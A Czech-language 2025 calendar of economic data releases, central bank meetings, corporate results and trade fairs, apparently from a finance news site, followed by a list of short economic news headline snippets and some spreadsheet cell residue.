6. - Začíná roční výluka stanic metra C Pankrác a B Českomoravská. 7. - ČSÚ zveřejní výsledky zahraničního obchodu za listopad. - Česká národní banka ( ČNB ) zveřejní své devizové rezervy k 31. prosinci a saldo devizových obchodů ČNB k 30. listopadu. - Eurostat zveřejní rychlý odhad prosincového vývoje inflace v eurozóně. - V Las Vegas začíná mezinárodní veletrh spotřební elektroniky CES. Do 10. ledna. - Bude zveřejněna míra nezaměstnanosti v EU za listopad. 9. - Úřad práce ČR zveřejní údaje o nezaměstnanosti za prosinec. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za listopad. - Německý statistický úřad zveřejní údaje o listopadovém vývoji průmyslové výroby v Německu . - Bude zveřejněn vývoj nezaměstnanosti v USA za měsíc prosinec. 13. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za prosinec, výsledky maloobchodu a indexy cen dovozu a vývozu za listopad. 14. - V Praze začíná dvoudenní konference Mléko 2025. Jedná se o největší konferenci v oblasti automatizace chovu skotu v Evropě . 15. - Začne fungovat elektronický systém tvorby právních předpisů e-Legislativa, vláda bude mít povinnost předkládat vyhlášky a nařízení elektronickou formou; návrhy zákonů mají mít elektronickou podobu v roce 2026. - Bude oznámen vývoj průmyslové výroby v EU za listopad. - Německý statistický úřad zveřejní odhad vývoje HDP na rok 2025. - Americké banky Citigroup a JPMorgan Chase zveřejní hospodářské výsledky za čtvrté čtvrtletí loňského roku. - Bude zveřejněn vývoj míry inflace v USA za prosinec. 16. - Končí druhý pokus o prodej pražského zámku Veleslavín v elektronické aukci, kterou vyhlásil Úřad pro zastupování státu ve věcech majetkových (ÚZSVM). 17. - ČSÚ zveřejní indexy cen výrobců za prosinec. - Konečná zpráva o vývoji inflace v EU za prosinec. - Bude zveřejněn vývoj inflace v Británii za prosinec. - Bude zveřejněn vývoj HDP Číny za čtvrté čtvrtletí. - Bude zveřejněn vývoj průmyslové výroby v USA za prosinec. - Účinnost nabývá nové evropské nařízení o digitální provozní odolnosti finančního sektoru (DORA). 20. - Schůze věřitelů zkrachovalé společnosti Arca Investments , projedná reorganizační plán sestavený věřitelem IFIS investiční fond. - V Bruselu zasedání ministrů financí zemí eurozóny, takzvané euroskupiny. - Ve švýcarském Davosu začíná zasedání Světového ekonomického fóra ( WEF ). Do 24. ledna. 21. - V Bruselu jednání unijních ministrů financí. - Evropské sdružení výrobců automobilů ( ACEA ) zveřejní zprávu o prodeji nových osobních aut v EU za prosinec. - Začít má první řádná schůze Sněmovny v roce 2025. 23. - Končí elektronická aukce středočeského zámku Štiřín , kterou vyhlásil ÚZSVM, a osmý pokus o prodej pražského Paláce Broadway v elektronické aukci vyhlášené stejným úřadem. 24. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za leden. 27. - Institut Ifo bude informovat o lednovém vývoji podnikatelské nálady v Německu . 29. - Institut GfK zveřejní index vývoje důvěry spotřebitelů v německou ekonomiku na únor. - Americká centrální banka (Fed) na závěr dvoudenní schůzky svého měnového výboru oznámí rozhodnutí o úrokových sazbách. 30. - Rychlý odhad vývoje HDP eurozóny i EU za čtvrté čtvrtletí. - Předběžná zpráva o vývoji hrubého domácího produktu (HDP) Francie za čtvrté čtvrtletí. - Rychlý odhad vývoje hrubého domácího produktu (HDP) Německa za čtvrté čtvrtletí. - Švédský prodejce oděvů H&amp;amp;M zveřejnil hospodářské výsledky za loňský rok. - Rychlý odhad vývoje hrubého domácího produktu (HDP) Spojených států za čtvrté čtvrtletí. - Ve Frankfurtu nad Mohanem zasedání Rady guvernérů Evropské centrální banky (ECB), které se bude zabývat měnovou politikou. - Bude zveřejněna míra nezaměstnanosti v EU za prosinec. 31. - ČSÚ zveřejní předběžný odhad HDP za 4. čtvrtletí 2024. - ČNB zveřejní statistiku měnového vývoje k 31. prosinci. - Moneta Money Bank zveřejní hospodářské výsledky za loňský rok. - Institut Ifo zveřejní vývoj nezaměstnanosti v Německu za měsíc leden. - Institut Ifo zveřejní předběžnou zprávu o vývoji inflace v Německu za leden. ÚNOR 3. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci ledna. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za leden. - Eurostat zveřejní rychlý odhad lednového vývoje inflace v eurozóně. 4. - Zveřejněny budou výsledky Raiffeisenbank za rok 2024. 5. - ČSÚ zveřejní výsledky maloobchodu za prosinec. 6. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za prosinec. - Měnověpolitické jednání bankovní rady ČNB . - Komerční banka zveřejní výsledky hospodaření za rok 2024. - Slavnostní vyhlášení ankety Auto roku 2025. - V Praze začínají veletrhy For Wood, For Pasiv a Střechy-Solar-Řemeslo. Do 8. února. - Britská centrální banka oznámí výsledek zasedání k měnové politice. 7. - ČSÚ zveřejní výsledky cestovního ruchu a údaje o službách za 4. čtvrtletí 2024. - Česká národní banka zveřejní své devizové rezervy k 31. lednu a saldo devizových obchodů ČNB k 31. prosinci. - Schůze věřitelů Jindřichohradeckých místních drah projedná a bude schvalovat reorganizační plán. - Bude zveřejněn vývoj nezaměstnanosti v USA za měsíc leden. 10. - Úřad práce ČR zveřejní údaje o nezaměstnanosti za leden. - ČSÚ zveřejní údaje o živočišné výrobě za 4. čtvrtletí a rok 2024 a indexy cen dovozu a vývozu za prosinec. 12. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za leden. - Bude zveřejněn vývoj míry inflace v USA za leden. 13. - Československá obchodní banka ( ČSOB ) zveřejní hospodářské výsledky za rok 2024. - Bude zveřejněn vývoj průmyslové výroby v EU za prosinec. 14. - Bude zveřejněna zpřesněná zpráva o vývoji hrubého domácího produktu (HDP) zemí Evropské unie za čtvrté čtvrtletí. - Bude zveřejněna předběžná zpráva o vývoji hrubého domácího produktu (HDP) Británie za čtvrté čtvrtletí. - Ruská centrální banka oznámí výsledek zasedání k měnové politice. 17. - ČSÚ zveřejní indexy cen výrobců za leden. V Bruselu začíná dvoudenní zasedání ministrů financí zemí eurozóny, takzvané euroskupiny. 19. - Slavnostní vyhlášení vítězů Vinařství roku 2024. 20. - Americká společnost Walmart , která je největším maloobchodním prodejcem na světě, zveřejní hospodářské výsledky za čtvrté čtvrtletí. 21. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za únor. - V Brně začíná veletrh módy Styl a veletrh obuvi a koženého zboží Kabo. Do 23. února. 24. - Institut Ifo bude informovat o únorovém vývoji podnikatelské nálady v Německu . - Bude zveřejněna konečná zpráva o vývoji inflace v EU za leden. 25. - V Brně začíná veletrh pro potravinářství a gastronomii Salima. Do 27. února. - Bude zveřejněna konečná zpráva o vývoji hrubého domácího produktu (HDP) Německa za čtvrté čtvrtletí. 26. - Institut GfK zveřejní index vývoje důvěry spotřebitelů v německou ekonomiku na březen. 27. - V O2 universu v Praze se koná Konference glampingu a malého bydlení. - Bude zveřejněna zpřesněná zpráva o vývoji hrubého domácího produktu (HDP) Spojených států za čtvrté čtvrtletí. 28. - ČSÚ zveřejní tvorbu a užití HDP za 4. čtvrtletí 2024. - Česká národní banka zveřejní statistiku měnového vývoje k 31. lednu. - Česká spořitelna zveřejní hospodářské výsledky za rok 2024. - Institut Ifo zveřejní vývoj nezaměstnanosti v Německu za měsíc únor. BŘEZEN 3. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci února. - Bude zveřejněn vývoj nezaměstnanosti v USA za měsíc únor. - Eurostat zveřejní rychlý odhad únorového vývoje inflace v eurozóně. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za únor. 4. - Začíná Mezinárodní turistická burza (ITB), která patří k největším veletrhům cestovního ruchu na světě (do 6. března). - Bude zveřejněna míra nezaměstnanosti v EU za leden. 6. - ČSÚ zveřejní údaje o průměrných mzdách za 4. čtvrtletí 2024. - Jednání bankovní rady ČNB o finanční stabilitě. - V Brně začíná prodejně-kontraktační veletrh potřeb pro dítě ProDítě. Do 8. března. - Začíná výstava motocyklů, čtyřkolek a příslušenství Motocykl Praha 2025. Do 9. března. - Ve Frankfurtu nad Mohanem zasedání Rady guvernérů Evropské centrální banky (ECB), které se bude zabývat měnovou politikou. 7. - Česká národní banka zveřejní své devizové rezervy k 28. únoru a saldo devizových obchodů ČNB k 31. lednu. - V Brně začíná mezinárodní veletrh oční optiky, optometrie a oftalmologie Opta. Do 9. března. - Zpřesněná zpráva o vývoji hrubého domácího produktu (HDP) zemí Evropské unie za čtvrté čtvrtletí. 10. - ČSÚ zveřejní výsledky zahraničního obchodu za leden. 11. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za únor. 12. - ČSÚ zveřejní výsledky průmyslu a stavebnictví za leden. - Bude zveřejněn vývoj míry inflace v USA za únor. 13. - ČSÚ zveřejní výsledky maloobchodu za leden. - Bude zveřejněn vývoj průmyslové výroby v EU za leden. 14. - ČNB zveřejní platební bilanci za 4. čtvrtletí 2024 a leden 2025. - V Praze začínají veletrhy Holiday World &amp;amp; Region World a For Bikes. Do 16. března. 17. - ČSÚ zveřejní indexy cen výrobců za únor a indexy cen dovozu a vývozu za leden. 18. - V Brně začíná veletrh Amper . Do 20. března. - Vyhlášení výsledků dvacátého ročníku anticen Velkého bratra pro instituce a společnosti porušující ochranu soukromí, které uděluje spolek Iuridicum Remedium (IuRe). 19. - Bude zveřejněna konečná zpráva o vývoji inflace v EU za únor. - Americká centrální banka (Fed) na závěr dvoudenní schůzky svého měnového výboru oznámí rozhodnutí o úrokových sazbách. 20. - Britská centrální banka oznámí výsledek zasedání k měnové politice. 21. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za březen. - ČNB zveřejní investiční pozice ČR vůči zahraničí a zahraniční zadluženost k 31. prosinci. - V Praze začínají veletrhy For Boat a For Caravan. Do 23. března. - Ruská centrální banka oznámí výsledek zasedání k měnové politice. 25. - V Praze začíná dvoudenní mezinárodní konference Equal Pay Day (EPD), která upozorňuje na přetrvávající nerovnosti v odměňování žen a mužů. - Institut Ifo bude informovat o březnovém vývoji podnikatelské nálady v Německu . 26. - Měnověpolitické jednání bankovní rady ČNB . - Začínají Stavební veletrh Brno , veletrh Dřevo a stavby Brno a veletrh nábytku a interiérového designu Mobitex. Do 29. března. 27. - V Praze začíná 15. veletrh chovatelských potřeb pro domácí zvířata For Pets. Do 30. března. - V Lipsku začíná Mezinárodní knižní veletrh, do 30. března. - Bude zveřejněna konečná zpráva o vývoji hrubého domácího produktu (HDP) Spojených států za čtvrté čtvrtletí. 28. - Vývoj nezaměstnanosti v Německu za měsíc březen. - Institut GfK zveřejní index vývoje důvěry spotřebitelů v německou ekonomiku na duben. - Bude zveřejněna konečná zpráva o vývoji hrubého domácího produktu (HDP) Británie za čtvrté čtvrtletí. 31. - ČNB zveřejní statistiku měnového vývoje k 28. únoru. - V Hannoveru začíná veletrh výpočetní techniky ( CeBIT ), do 4. dubna. - Bude zveřejněna předběžná zpráva o vývoji inflace v Německu za březen. DUBEN 1. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci března. - ČSÚ zveřejní čtvrtletní sektorové účty za 4. čtvrtletí 2024, tedy vývoj HDP včetně struktury. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za březen. - Od České pošty se oddělí Balíkovna jako poskytovatel komerčních poštovních služeb. Nějakou dobu pak zůstane ve vlastnictví státu, aby se ukázalo, jak dokáže samostatně fungovat. 2. - ČSÚ zveřejní deficit a dluh vládních institucí za 4. čtvrtletí 2024. 3. - V Praze začnou veletrhy For Garden a Design Shaker. Do 6. dubna. 4. - ČSÚ zveřejní výsledky maloobchodu za únor. 7. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za únor. 10. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za březen a indexy cen dovozu a vývozu za únor. 11. - V Praze začíná 20. veletrh hraček, her a potřeb pro děti For Kids. Do 13. dubna. 12. - V Brně začne mezinárodní veletrh zemědělské techniky Techagro. Do 16. dubna. 13. - V japonské Ósace začíná světová výstava Expo , do 13. října. 15. - Na ozubnicové trati z Tanvaldu na Kořenov na Jablonecku začíná úplná výluka kvůli rekonstrukci. Hotova má být v únoru 2026. 16. - ČSÚ zveřejní indexy cen výrobců za březen. 17. - Ve Frankfurtu nad Mohanem zasedání Rady guvernérů Evropské centrální banky (ECB), které se bude zabývat měnovou politikou. 23. - ČSÚ zveřejní notifikaci deficitu a dluhu vládních institucí za rok 2024 (první notifikace, údaje notifikované Eurostatem). - V Olomouci začíná dvoudenní odborná konference Dny teplárenství a energetiky 2025. 24. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za duben. - Začíná mezinárodní květinová a zahradnická výstava Flora Olomouc. Do 27. dubna. - Institut Ifo bude informovat o dubnovém vývoji podnikatelské nálady v Německu . 25. - Moneta Money Bank zveřejní hospodářské výsledky za první čtvrtletí 2025. - Ruská centrální banka oznámí výsledek zasedání k měnové politice. 26. - Mělo by se konat jarní kolo Sbírky potravin. 29. - Institut GfK zveřejní index vývoje důvěry spotřebitelů v německou ekonomiku na květen. 30. - ČSÚ zveřejní předběžný odhad HDP za 1. čtvrtletí 2025. - Česká spořitelna a Komerční banka zveřejní hospodářské výsledky za první čtvrtletí 2025. - Vývoj nezaměstnanosti v Německu za měsíc duben. KVĚTEN 2. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci dubna. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za duben. 6. - Zveřejněny budou výsledky Raiffeisenbank za první čtvrtletí. 7. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za březen. - Měnověpolitické jednání bankovní rady ČNB . - Americká centrální banka (Fed) na závěr dvoudenní schůzky svého měnového výboru oznámí rozhodnutí o úrokových sazbách. 8. - Britská centrální banka oznámí výsledek zasedání k měnové politice. 9. - ČSÚ zveřejní výsledky cestovního ruchu a údaje o službách za 1. čtvrtletí 2025 a výsledky maloobchodu za březen. 13. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za duben, údaje o živočišné výrobě za 1. čtvrtletí a indexy cen dovozu a vývozu za březen. 15. - Československá obchodní banka ( ČSOB ) zveřejní hospodářské výsledky za první čtvrtletí. 16. - ČSÚ zveřejní indexy cen výrobců za duben. 17. - Začíná mezinárodní prodejní výstava minerálů, fosilií, šperků a přírodnin Minerály Brno . Do 18. května. 22. - Institut Ifo bude informovat o květnovém vývoji podnikatelské nálady v Německu . 26. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za květen. 27. - Institut GfK zveřejní index vývoje důvěry spotřebitelů v německou ekonomiku na červen. 28. - V Brně začínají mezinárodní veletrh obranné a bezpečnostní techniky IDET , mezinárodní veletrh požární techniky a služeb Pyros a mezinárodní veletrh bezpečnostní techniky a služeb ISET. Do 30. května. - Institut Ifo zveřejní vývoj nezaměstnanosti v Německu za měsíc květen. 30. - ČSÚ zveřejní tvorbu a užití HDP za 1. čtvrtletí 2025. ČERVEN 2. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci května. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za květen. 4. - ČSÚ zveřejní údaje o průměrných mzdách za 1. čtvrtletí 2025 a výsledky maloobchodu za duben. 5. - Jednání bankovní rady ČNB o finanční stabilitě. - Ve Frankfurtu nad Mohanem zasedání Rady guvernérů Evropské centrální banky (ECB), které se bude zabývat měnovou politikou. 6. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za duben. - Ruská centrální banka oznámí výsledek zasedání k měnové politice. 10. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za květen a indexy cen dovozu a vývozu za duben. - V Brně začne veletrh chytrých řešení pro města a obce Urbis Smart City Fair. Do 12. června. 16. - ČSÚ zveřejní indexy cen výrobců za květen. 18. - Americká centrální banka (Fed) na závěr dvoudenní schůzky svého měnového výboru oznámí rozhodnutí o úrokových sazbách. 19. - Britská centrální banka oznámí výsledek zasedání k měnové politice. 24. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za červen. - Institut Ifo bude informovat o červnovém vývoji podnikatelské nálady v Německu . 25. - Měnověpolitické jednání bankovní rady ČNB . 26. - Institut GfK zveřejní index vývoje důvěry spotřebitelů v německou ekonomiku na červenec. 27. - ČSÚ zveřejní čtvrtletní sektorové účty za 1. čtvrtletí, tedy vývoj HDP včetně struktury. ČERVENEC 1. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci června. - ČSÚ zveřejní deficit a dluh vládních institucí za 1. čtvrtletí. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za červen. - Institut Ifo zveřejní vývoj nezaměstnanosti v Německu za měsíc červen. 4. - ČSÚ zveřejní výsledky maloobchodu za květen a odhady sklizní za červen. 7. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za květen. 10. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za červen a indexy cen dovozu a vývozu za květen. 16. - ČSÚ zveřejní indexy cen výrobců za červen. 24. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za červenec. - Moneta Money Bank zveřejní hospodářské výsledky za první pololetí 2025. 25. - Institut Ifo bude informovat o červencovém vývoji podnikatelské nálady v Německu . - Ruská centrální banka oznámí výsledek zasedání k měnové politice. 27. - Ve Frankfurtu nad Mohanem zasedání Rady guvernérů Evropské centrální banky (ECB), které se bude zabývat měnovou politikou. 30. - ČSÚ zveřejní předběžný odhad HDP za 2. čtvrtletí. - Budou zveřejněny výsledky Raiffeisenbank za první pololetí. - Americká centrální banka (Fed) na závěr dvoudenní schůzky svého měnového výboru oznámí rozhodnutí o úrokových sazbách. 31. - Institut Ifo zveřejní vývoj nezaměstnanosti v Německu za měsíc červenec. SRPEN 1. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci července. - Česká spořitelna zveřejní hospodářské výsledky za první pololetí 2025. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za červenec. 6. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za červen. 7. - ČSÚ zveřejní výsledky maloobchodu za červen a údaje o službách za 2. čtvrtletí 2025. - Měnověpolitické jednání bankovní rady ČNB . - Československá obchodní banka ( ČSOB ) zveřejní hospodářské výsledky za první pololetí. 8. - ČSÚ zveřejní odhady sklizní za červenec, výsledky cestovního ruchu a údaje o živočišné výrobě za 2. čtvrtletí. 11. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za červenec a indexy cen dovozu a vývozu za červen. 17. - Americká centrální banka (Fed) na závěr dvoudenní schůzky svého měnového výboru oznámí rozhodnutí o úrokových sazbách. 18. - ČSÚ zveřejní indexy cen výrobců za červenec. 21. - V Českých Budějovicích začne 51. ročník mezinárodního agrosalonu Země živitelka. Do 26. srpna. 24. - Institut Ifo bude informovat o srpnovém vývoji podnikatelské nálady v Německu . 25. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za srpen. 29. - ČSÚ zveřejní tvorbu a užití HDP za 2. čtvrtletí 2025. ZÁŘÍ 1. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci srpna. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za srpen. 3. - ČSÚ zveřejní údaje o průměrných mzdách za 2. čtvrtletí. 5. - ČSÚ zveřejní výsledky maloobchodu za červenec. 7. - Britská centrální banka oznámí výsledek zasedání k měnové politice. 8. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za červenec. 9. - V Hannoveru začíná tradiční mezinárodní autosalon. Do 19. září. 10. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za srpen a indexy cen dovozu a vývozu za červenec. 11. - Jednání bankovní rady ČNB o finanční stabilitě. - Ve Frankfurtu nad Mohanem zasedání Rady guvernérů Evropské centrální banky (ECB), které se bude zabývat měnovou politikou. 12. - Ruská centrální banka oznámí výsledek zasedání k měnové politice. 16. - ČSÚ zveřejní indexy cen výrobců za srpen. 18. - Britská centrální banka oznámí výsledek zasedání k měnové politice. 20. - V Mnichově začíná tradiční pivní festival Oktoberfest. Do 5. října 24. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za září. - Měnověpolitické jednání bankovní rady ČNB . - Institut Ifo bude informovat o zářijovém vývoji podnikatelské nálady v Německu . 30. - ČSÚ zveřejní čtvrtletní sektorové účty za 2. čtvrtletí, tedy vývoj HDP včetně struktury. - Institut Ifo zveřejní Vývoj nezaměstnanosti v Německu za měsíc září. ŘÍJEN 1. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci září. - ČSÚ zveřejní deficit a dluh vládních institucí za 2. čtvrtletí 2025. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za září. 7. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za srpen. - Začíná 66. ročník Mezinárodního strojírenského veletrhu, mezinárodní veletrh dopravy a logistiky Transport a Logistika a mezinárodní veletrh technologií pro ochranu životního prostředí Envitech. Do 10. října. 8. - ČSÚ zveřejní výsledky maloobchodu za srpen. 10. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za září a indexy cen dovozu a vývozu za srpen. 16. - ČSÚ zveřejní indexy cen výrobců za září. 17. - Ve Washingtonu začínají zasedání Mezinárodního měnového fondu a Světové banky . Do 19. října. 23. - Moneta Money Bank zveřejní hospodářské výsledky za třetí čtvrtletí 2025. 24. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za říjen a odhady sklizní za září. - Ruská centrální banka oznámí výsledek zasedání k měnové politice. 27. - Institut Ifo bude informovat o říjnovém vývoji podnikatelské nálady v Německu . 29. - Americká centrální banka (Fed) na závěr dvoudenní schůzky svého měnového výboru oznámí rozhodnutí o úrokových sazbách. 30. - ČSÚ zveřejní předběžný odhad HDP za 3. čtvrtletí. - Zveřejněny budou výsledky Raiffeisenbank za třetí čtvrtletí 2025. 30. - Institut Ifo zveřejní vývoj nezaměstnanosti v Německu za měsíc říjen. - V Římě zasedání Rady guvernérů Evropské centrální banky (ECB), které se bude zabývat měnovou politikou. 31. - Česká spořitelna zveřejní hospodářské výsledky za třetí čtvrtletí 2025. LISTOPAD 3. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci října. 6. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za září. - Měnověpolitické jednání bankovní rady ČNB . - Začíná mezinárodní výstava karavanů a obytných automobilů Caravaning Brno. Do 9. listopadu. - Britská centrální banka oznámí výsledek zasedání k měnové politice. 7. - ČSÚ zveřejní výsledky maloobchodu za září a údaje o službách a výsledky cestovního ruchu za 3. čtvrtletí 2025. 10. - ČSÚ zveřejní údaje o živočišné výrobě za 3. čtvrtletí. 11. - ČSÚ zveřejní indexy cen dovozu a vývozu za září. 13. - Československá obchodní banka ( ČSOB ) zveřejní hospodářské výsledky za třetí čtvrtletí. 18. - ČSÚ zveřejní indexy cen výrobců za říjen. 24. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za listopad. 25. - Institut Ifo bude informovat o listopadovém vývoji podnikatelské nálady v Německu . 27. - Jednání bankovní rady ČNB o finanční stabilitě. 28. - ČSÚ zveřejní tvorbu a užití HDP za 3. čtvrtletí 2025. PROSINEC 1. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci listopadu. 4. - ČSÚ zveřejní údaje o průměrných mzdách za 3. čtvrtletí. 5. - ČSÚ zveřejní výsledky maloobchodu za říjen. 8. - ČSÚ zveřejní výsledky průmyslu, stavebnictví a zahraničního obchodu za říjen. 10. - ČSÚ zveřejní indexy spotřebitelských cen - inflace za listopad a indexy cen dovozu a vývozu za říjen. - Americká centrální banka (Fed) na závěr dvoudenní schůzky svého měnového výboru oznámí rozhodnutí o úrokových sazbách. 16. - ČSÚ zveřejní indexy cen výrobců za listopad. 18. - Měnověpolitické jednání bankovní rady ČNB . - Ve Frankfurtu nad Mohanem zasedání Rady guvernérů Evropské centrální banky (ECB), které se bude zabývat měnovou politikou. - Britská centrální banka oznámí výsledek zasedání k měnové politice. 19. - Ruská centrální banka oznámí výsledek zasedání k měnové politice. 23. - ČSÚ zveřejní výsledky konjunkturálního průzkumu za prosinec. Zdroj: Reuters, ČTK Dubaj ve snaze podpořit turistiku zrušila třicetiprocentní daň z alkoholu Dubaj zrušila třicetiprocentní daň z alkoholu a vyžadovat přestala i poplatek za licenci nutnou k nákupu alkoholu v nákupních a turistických centrech. Na sociálních sítích to oznámily firmy African+Eastern a MMI, což jsou v Dubaji dva největší dodavatelé alkoholických nápojů. Krok má podle nich podpořit odvětví turistiky. Změny ve zdanění začaly platit v neděli, zkušebně zatím na rok, informují místní média. Dublin : Eurozóna Řecku nijak neustoupila Eurozóna v páteční dohodě Řecku nijak neustoupila a veškeré ústupky se odehrály na řecké straně. Řekl... Dubnová inflace byla nad očekáváním ČNB Dubnová meziroční inflace 2,9 procenta byla o 0,4 procentního bodu výš, než očekávala Česká národní banka ( ČNB ). Rozdíl způsobilo zdražení potravin, ostatní položky byly v souladu s prognózou centrální banky, uvedl v komentáři k vývoji spotřebitelských cen ředitel sekce měnové ČNB Petr Král . Předpokládá, že po zbytek roku se bude inflace pohybovat v blízkosti dvouprocentního cíle ČNB . Dubnová inflace byla o 0,5 procentního bodu nižší, než odhadovala ČNB Dubnová inflace byla o 0,5 procentního bodu nižší, než odhadovala Česká národní banka ( ČNB ) v jarní prognóze. Rozdíl způsobil zejména výrazně pomalejší meziroční růst cen potravin, znatelně menší měrou pak přispěla lehce nižší než očekávaná jádrová inflace, uvedl ředitel sekce měnové ČNB Petr Král . Meziroční růst spotřebitelských cen v dubnu zpomalil na 12,7 procenta z březnových 15 procent, oznámil dnes Český statistický úřad . ČNB nyní čeká, že inflace bude v každém dalším měsíci o více než jeden procentní bod nižší než v měsíci předchozím. Dubnová inflace byla vyšší, než odhadovala ČNB Dubnová meziroční inflace byla o 0,2 procentního bodu vyšší, než odhadovala Česká národní banka v prognóze. Uvedl to dnes ředitel sekce měnové ČNB Petr Král . Důvodem rozdílu byla vyšší než očekávaná jádrová inflace, která je očištěná o sezónní vlivy, změny regulovaných cen, daňové úpravy a jiná administrativní opatření. Meziroční inflace v dubnu podle dnešních údajů Českého statistického úřadu klesla na 3,2 procenta. Dubnová inflace byla vyšší, než odhadovala ČNB Dubnová meziroční inflace byla o 0,2 procentního bodu vyšší, než odhadovala Česká národní banka ( ČNB ) v prognóze. Důvodem byl především větší než očekávaný růst cen potravin. Uvedl to dnes ředitel sekce měnové ČNB Petr Král . Meziroční inflace v dubnu podle dnešních údajů Českého statistického úřadu stoupla na 3,1 procenta. Dubnová meziroční inflace byla o 0,4 procentního bodu vyšší, než odhadovala ČNB Dubnová meziroční inflace byla o 0,4 procentního bodu vyšší, než odhadovala Česká národní banka ( ČNB ) v nové květnové prognóze. Důvodem byl především větší než očekávaný růst jádrové inflace, což je inflace očištěná o sezonní vlivy, a regulovaných cen, tedy cen energií. Méně, než očekávala ČNB , rostly ceny potravin. Odhad růstu cen pohonných hmot se v podstatě naplnil. Uvedl to dnes ředitel sekce měnové ČNB Petr Král . Meziroční inflace v Česku v dubnu stoupla na 14,2 procenta. To je nejvyšší hodnota od prosince 1993. Dubnové zpomalení inflace analytiky překvapilo, táhlo ho zlevnění potravin Dubnové zpomalení meziroční inflace na 12,7 procenta bylo pro analytiky překvapením, trh i Česká národní banka ( ČNB ) očekávaly vyšší hodnotu. Důvodem výraznějšího zvolnění inflace bylo meziměsíční zlevnění potravin, shodují se odborníci, zároveň ale upozorňují, že vzhledem ke kolísavosti cen potravin je třeba brát tento efekt s rezervou. Na jednociferná čísla podle nich meziroční inflace klesne v červnu nebo v červenci. Dufek : Obnovení růstu českého hospodářství potrvá déle Obnovení růstu českého hospodářství potrvá déle, než se původně očekávalo. Na mezinárodní konferenci Asociace samostatných odborů to řekl její předseda Bohumír Dufek . Ekonomika podle něj už nikdy nebude fungovat za stejných podmínek, jaké byly před příchodem pandemie koronaviru. Dukascopy bude partnerem běloruské banky Švýcarský obchodník s cennými papíry Dukascopy Bank bude v takzvaném white-label partnerství s přední... Důležité fundamentální zprávy a události Eurozóna: Itálie zatím nesplňuje stanovený cíl snižování rozpočtového deficitu na letošní rok. Členům dolní komory parlamentu to řekl náměstek ministra financí Gianfranco Polillo. Italové mají cíl snížit letos deficit na 1,7 procenta hrubého domácího produktu. Důležité shrnutí a dnešní ekonomický kalendář Moody a pravděpodobnost negativního výhledu pro rating USA Důležité události a dnešní makrodata Mezinárodní měnový fond schválil uvolnění dalších 3,9 miliardy eur ze záchranného úvěru pro Irsko Důležité události a dnešní makrodata Nálada německých podnikatelů se v prosinci nečekaně zlepšila. Důležité události a dnešní makroekonomický kalendář Německá podnikatelská důvěra měřena indexem Ifo v září klesla potřetí v řadě na 107,5 bodu. Důležité události a dnešní vyhlašování Švýcarský frank včera zaznamenal k USD rekordní denní ztráty. Důležité události a makrodata Obamovi demokraté utrpěli porážku. Důležité upozornění Dnes začíná historicky první dvoudenní strategický a ekonomický dialog mezi Spojenými státy a Čínou a bude se z velké části týkat amerického dolaru. Důležité úrovně pro GBP/USD Sestup měnového páru GBP/USD pod 1,5705 přesunul pozornost na hladinu, kde je hodnota se 100% Fibonacci expanze. Autor: O nás</t>
  </si>
  <si>
    <t>4140</t>
  </si>
  <si>
    <t>4800</t>
  </si>
  <si>
    <t>20250101_137_3696206632_4fbc3e8bb243a81f477a.html</t>
  </si>
  <si>
    <t>4fbc3e8bb243a81f477a</t>
  </si>
  <si>
    <t>Prokleté oslavy: 5&amp;nbsp;nejhorších zážitků ze Silvestra, které vás pobaví</t>
  </si>
  <si>
